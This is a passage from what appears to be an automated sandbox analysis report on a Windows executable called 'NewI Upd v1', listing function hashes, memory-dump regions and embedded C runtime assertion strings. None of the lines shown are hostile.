                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr
                                                                                  • API String ID: 0-454128329
                                                                                  • Opcode ID: b33e221755c174cbad4642f360523865f7cdabfa81df48921ea130c8cdc55afc
                                                                                  • Instruction ID: 195a43f411fb04275d0c8a3ba7cf416095b587205d434d028b85f68bc1e73662
                                                                                  • Opcode Fuzzy Hash: b33e221755c174cbad4642f360523865f7cdabfa81df48921ea130c8cdc55afc
                                                                                  • Instruction Fuzzy Hash: 12B15B70A00609DFEB04DFA8C881BBE77B1FF46324F248619E926EB791D7749981CB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$("Buffer too small", 0)$_wctomb_internal$destination_count <= INT_MAX$destination_count > 0$minkernel\crts\ucrt\src\appcrt\convert\wctomb.cpp
                                                                                  • API String ID: 0-3614322479
                                                                                  • Opcode ID: fa727fc23086008139b903d74c12e0fb31c4e65a09b142e168e9f08daa265f2f
                                                                                  • Instruction ID: e32284ff2dd565cc13ae43553909aa23f1f54a595b31dd0c8075ed5fe2058ace
                                                                                  • Opcode Fuzzy Hash: fa727fc23086008139b903d74c12e0fb31c4e65a09b142e168e9f08daa265f2f
                                                                                  • Instruction Fuzzy Hash: B6A14C70A40209EFDF24EF94D856BEE7BB1FB54704F188419F911AA3C1D7B49A80CB91
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 00889DEA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                                                                                  • API String ID: 4219598475-3439959449
                                                                                  • Opcode ID: 0b3f33a0df1f83c18f3d2dd20dc8c0520ba24d15dcdf2f1b03e1fea0a500adfe
                                                                                  • Instruction ID: f9d0caaa7bb711d8f656e2bc985e750c2b9b7e31d2dae584af097db1f2a3fb53
                                                                                  • Opcode Fuzzy Hash: 0b3f33a0df1f83c18f3d2dd20dc8c0520ba24d15dcdf2f1b03e1fea0a500adfe
                                                                                  • Instruction Fuzzy Hash: 3BB128B094021C8FDB24EF14CC85BAAB7B0FF55314F1442D8E659A7282DB75AE84CF5A
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMTD ref: 0087E10D
                                                                                  • ___except_validate_context_record.LIBVCRUNTIMED ref: 0087E119
                                                                                    • Part of subcall function 0087EA00: __guard_icall_checks_enforced.LIBCMTD ref: 0087EA06
                                                                                  • __IsNonwritableInCurrentImage.LIBCMTD ref: 0087E1D5
                                                                                  • _ValidateLocalCookies.LIBCMTD ref: 0087E240
                                                                                  • _ValidateLocalCookies.LIBCMTD ref: 0087E293
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                                                                  • String ID: csm
                                                                                  • API String ID: 3439031638-1018135373
                                                                                  • Opcode ID: ea3c0e4879a45615b44f90cc3b184867127a075347c1359b8b8e81644a99ae99
                                                                                  • Instruction ID: cdd823658458d28c1218813a98cbf955446c3c19e79835bac85597509159105a
                                                                                  • Opcode Fuzzy Hash: ea3c0e4879a45615b44f90cc3b184867127a075347c1359b8b8e81644a99ae99
                                                                                  • Instruction Fuzzy Hash: 2C510F74E00209DFCB04DF98D881AAEBBB5FF8D314F108198E519A7356D735EA41CBA5
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcstombs_l
                                                                                  • String ID: %ls$IS_2_POW_N(alignment)$_aligned_offset_malloc_dbg$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$offset == 0 || offset < size
                                                                                  • API String ID: 3007373345-1586087174
                                                                                  • Opcode ID: ea5066b2e4c82edc3351d7c08af692a2ecff4772a1d55767b36e425d6ac2aace
                                                                                  • Instruction ID: c0900e91023eb080ffb5ef982e7362425f8f5efeaef294d3aa264e1fdccc69f0
                                                                                  • Opcode Fuzzy Hash: ea5066b2e4c82edc3351d7c08af692a2ecff4772a1d55767b36e425d6ac2aace
                                                                                  • Instruction Fuzzy Hash: 9A514C70E4060DAFDF10EF94CC46BAEB7B1FB48304F248524E915AA381D7B9AA40CF55
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close_internal$minkernel\crts\ucrt\src\appcrt\lowio\close.cpp
                                                                                  • API String ID: 0-4089689869
                                                                                  • Opcode ID: 2a242c15477c938be2512c44ec0a7002f8c4e0026a34ab6e59fd6313858d500b
                                                                                  • Instruction ID: ef1b85052717404004094f65334c9c71921a7bd6f85010c1c0ccec6163ef4d81
                                                                                  • Opcode Fuzzy Hash: 2a242c15477c938be2512c44ec0a7002f8c4e0026a34ab6e59fd6313858d500b
                                                                                  • Instruction Fuzzy Hash: D1512E70A4021CAFEB14EF98DC52BBE7770FB51714F208159F925AA7D2DBB49A40CB81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_commit$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                                                                  • API String ID: 0-1026578051
                                                                                  • Opcode ID: 2939147a7a77e92612ca7df81c911c72838e2ca130941859b7cae70f7841a652
                                                                                  • Instruction ID: cb9bf49442844487f83835e3e2e0236904cb52c628683e8d58b5aadc9c66e8ae
                                                                                  • Opcode Fuzzy Hash: 2939147a7a77e92612ca7df81c911c72838e2ca130941859b7cae70f7841a652
                                                                                  • Instruction Fuzzy Hash: E631C970A4030CEEEB24DB54CC46BAD7B70FB01724F184144F525EA7C6E7B99A90DB95
                                                                                  APIs
                                                                                  Strings
                                                                                  • fp_format_nan_or_infinity, xrefs: 0089DC12
                                                                                  • minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 0089DC0D
                                                                                  • strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit]), xrefs: 0089DC17
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __aligned_msize__invoke_watson_if_error_strlen
                                                                                  • String ID: fp_format_nan_or_infinity$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$strcpy_s( result_buffer, result_buffer_count, strings[row][column + !long_string_will_fit])
                                                                                  • API String ID: 2470549621-3631232711
                                                                                  • Opcode ID: ca209ca335223127f90bb80d47922cac0564e3cdf2ba8c17b28952f887afcf47
                                                                                  • Instruction ID: 9de5f53d08f1c3bcaf328766a4fa6786dc4f00843dd83fc0b7f7ec00c2b573ce
                                                                                  • Opcode Fuzzy Hash: ca209ca335223127f90bb80d47922cac0564e3cdf2ba8c17b28952f887afcf47
                                                                                  • Instruction Fuzzy Hash: 9331A8B09043899BDF10DF68C851BAF7FB1FF45304F188199E855A7381D275DA14CB95
                                                                                  APIs
                                                                                  • _strlen.LIBCMT ref: 008819BB
                                                                                  • __aligned_msize.LIBCMTD ref: 00881A16
                                                                                  • __crt_unique_heap_ptr.LIBCMTD ref: 00881A21
                                                                                    • Part of subcall function 00881900: __crt_unique_heap_ptr.LIBCMTD ref: 0088190A
                                                                                  Strings
                                                                                  • %ls, xrefs: 0088196E
                                                                                  • D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00881977
                                                                                  • to->_What == nullptr && to->_DoFree == false, xrefs: 00881969
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
                                                                                  • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                                                                                  • API String ID: 3817959681-3183830673
                                                                                  • Opcode ID: 7dccf255426ffda95d48492c247f8e71faf1e4db74fd454cf110208b805a250a
                                                                                  • Instruction ID: 0e9d40f732ea5a4f05c18efa43964c4d30081605aed6e880ad5a9ebea013ec43
                                                                                  • Opcode Fuzzy Hash: 7dccf255426ffda95d48492c247f8e71faf1e4db74fd454cf110208b805a250a
                                                                                  • Instruction Fuzzy Hash: 3D314D74A00218AFCB04EF98C892AADBB75FF55304F54C099E919DB392DB71EA41CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1a5af9c0e8b07248d55a3f493273fa39902c2aee274252d9c60d998238bcb319
                                                                                  • Instruction ID: e9aee097a0c2defde5169a2693834f3f2798373535ab615803648bc4dbf100f1
                                                                                  • Opcode Fuzzy Hash: 1a5af9c0e8b07248d55a3f493273fa39902c2aee274252d9c60d998238bcb319
                                                                                  • Instruction Fuzzy Hash: 3161D171C04B08DADB16EF38D94616EBBB4FF52345F108729F888AA941EB308A95D653
                                                                                  APIs
                                                                                  Strings
                                                                                  • %ls, xrefs: 0089A393
                                                                                  • minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp, xrefs: 0089A39F
                                                                                  • (ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat, xrefs: 0089A38E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___free_lconv_mon___free_lconv_num
                                                                                  • String ID: %ls$(ptloci->lc_category[category].locale != nullptr && ptloci->lc_category[category].refcount != nullptr) || (ptloci->lc_category[cat$minkernel\crts\ucrt\src\appcrt\locale\locale_refcounting.cpp
                                                                                  • API String ID: 717313246-164516335
                                                                                  • Opcode ID: d54e5b06dcdfafc2713a45f108d7e76521e2cdd9cd4e90dbe6ebe9df931b3392
                                                                                  • Instruction ID: 71f1256911b1e7b75c89a2d915469d6c66c8e62e824a38b05c517085ba34d5b9
                                                                                  • Opcode Fuzzy Hash: d54e5b06dcdfafc2713a45f108d7e76521e2cdd9cd4e90dbe6ebe9df931b3392
                                                                                  • Instruction Fuzzy Hash: 23813E74600204EFEB18DF58C885FA93762FB44348F588168E9499F782DB75EE85DBC1
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 008A9E2F
                                                                                    • Part of subcall function 008A25C0: std::_Timevec::_Timevec.LIBCPMTD ref: 008A25D0
                                                                                    • Part of subcall function 008A5450: std::_Timevec::_Timevec.LIBCPMTD ref: 008A5486
                                                                                    • Part of subcall function 0089F0E0: std::_Timevec::_Timevec.LIBCPMTD ref: 0089F0EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: %ls$_fclose_nolock_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                                                                  • API String ID: 4219598475-3166852756
                                                                                  • Opcode ID: b3d0c1f48c92a8255d2104506eb9d37abecb6e81f7319a2c7390cd28afdae0c3
                                                                                  • Instruction ID: a49bbd07ed74b0e767b63936f2fb2421bbd8b28b38cfa48c63d08a8aa6672305
                                                                                  • Opcode Fuzzy Hash: b3d0c1f48c92a8255d2104506eb9d37abecb6e81f7319a2c7390cd28afdae0c3
                                                                                  • Instruction Fuzzy Hash: 8A316DB0D00208EAEB14EBA8CC56BAE7764FF51314F104654F515EA6C2EB749B14CB92
                                                                                  APIs
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 008A9CF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_
                                                                                  • String ID: %ls$_fclose_internal$minkernel\crts\ucrt\src\appcrt\stdio\fclose.cpp$stream.valid()
                                                                                  • API String ID: 4219598475-2931739134
                                                                                  • Opcode ID: 93140d546b48be594bdb0ca4f1e0a8fa5179042e25c14bbfb3e5d8ede309f35b
                                                                                  • Instruction ID: c8ac75e06705d1ab15bc6594460d1bf9aebffa7d427aeeba04a7fec7072aff69
                                                                                  • Opcode Fuzzy Hash: 93140d546b48be594bdb0ca4f1e0a8fa5179042e25c14bbfb3e5d8ede309f35b
                                                                                  • Instruction Fuzzy Hash: 5F31A071D44308ABEB04EFA8DC42BEE77B4FB55324F204229F025E66D2DBB95904C765
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: %ls$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle$minkernel\crts\ucrt\src\appcrt\internal\winapi_thunks.cpp
                                                                                  • API String ID: 0-442401637
                                                                                  • Opcode ID: 1b08b44a5a120731d8fcb00517b2a231ca1223951c22acfdc57c788cd8f596d1
                                                                                  • Instruction ID: 6087ef43b42347a3b84fbedd0a4e73c937ff364814f586989817738a7edd0125
                                                                                  • Opcode Fuzzy Hash: 1b08b44a5a120731d8fcb00517b2a231ca1223951c22acfdc57c788cd8f596d1
                                                                                  • Instruction Fuzzy Hash: 80219370D40219BBDF24EAA4DC8AB9D7374FB0131CF144654F515EA2C2E6749A50DA82
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,0088302A,?,00882D0D,?,?,?,?,?,0088320A), ref: 008987A8
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 008987B2
                                                                                  • __wcstombs_l.LIBCMTD ref: 00898811
                                                                                  • std::_Timevec::_Timevec.LIBCPMTD ref: 0089881D
                                                                                  Strings
                                                                                  • minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00898804
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: TimevecTimevec::_std::_$EnvironmentStrings__wcstombs_l
                                                                                  • String ID: minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp
                                                                                  • API String ID: 1494238470-170101930
                                                                                  • Opcode ID: 7716f5da16cb7b669461c1f7a9c3d52c9561717a8290f2edb854e70b933b6d11
                                                                                  • Instruction ID: 0453c89040f5b038565bc5c184ec986e3445bcae3de4cbf4585cd9b046157f28
                                                                                  • Opcode Fuzzy Hash: 7716f5da16cb7b669461c1f7a9c3d52c9561717a8290f2edb854e70b933b6d11
                                                                                  • Instruction Fuzzy Hash: 9831EB71C00119EBCF18FFA8D8969EEB7B4FF54300F540168A102E6192EF35AB05CB92
                                                                                  APIs
                                                                                  • FlushFileBuffers.KERNEL32(00000000), ref: 008A6B34
                                                                                  • GetLastError.KERNEL32 ref: 008A6B42
                                                                                  Strings
                                                                                  • ("Invalid file descriptor. File possibly closed by a different thread",0), xrefs: 008A6B64
                                                                                  • %ls, xrefs: 008A6B69
                                                                                  • minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp, xrefs: 008A6B72
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffersErrorFileFlushLast
                                                                                  • String ID: %ls$("Invalid file descriptor. File possibly closed by a different thread",0)$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                                                                  • API String ID: 1917127615-1268643607
                                                                                  • Opcode ID: 312a7ec81b7d66b09245fd023f3196a269ec8a20d20afd139b80428cd5bf8cb1
                                                                                  • Instruction ID: 5914149c89e4342754141a01eae9f01a365e9b38e20b822e19ca1a0358a66c19
                                                                                  • Opcode Fuzzy Hash: 312a7ec81b7d66b09245fd023f3196a269ec8a20d20afd139b80428cd5bf8cb1
                                                                                  • Instruction Fuzzy Hash: 28112534A00204AFDB00EFB8DC46A1D7761FB47324F2841A8F511DB3A1E635EE12CB60
                                                                                  APIs
                                                                                    • Part of subcall function 0087FD50: ___vcrt_getptd.LIBVCRUNTIMED ref: 0087FD56
                                                                                    • Part of subcall function 0087FD50: ___vcrt_getptd.LIBVCRUNTIMED ref: 0087FD6C
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 008811CF
                                                                                  • ___vcrt_getptd.LIBVCRUNTIMED ref: 008811DA
                                                                                  • __IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 00881230
                                                                                  • ___DestructExceptionObject.LIBCMTD ref: 00881255
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
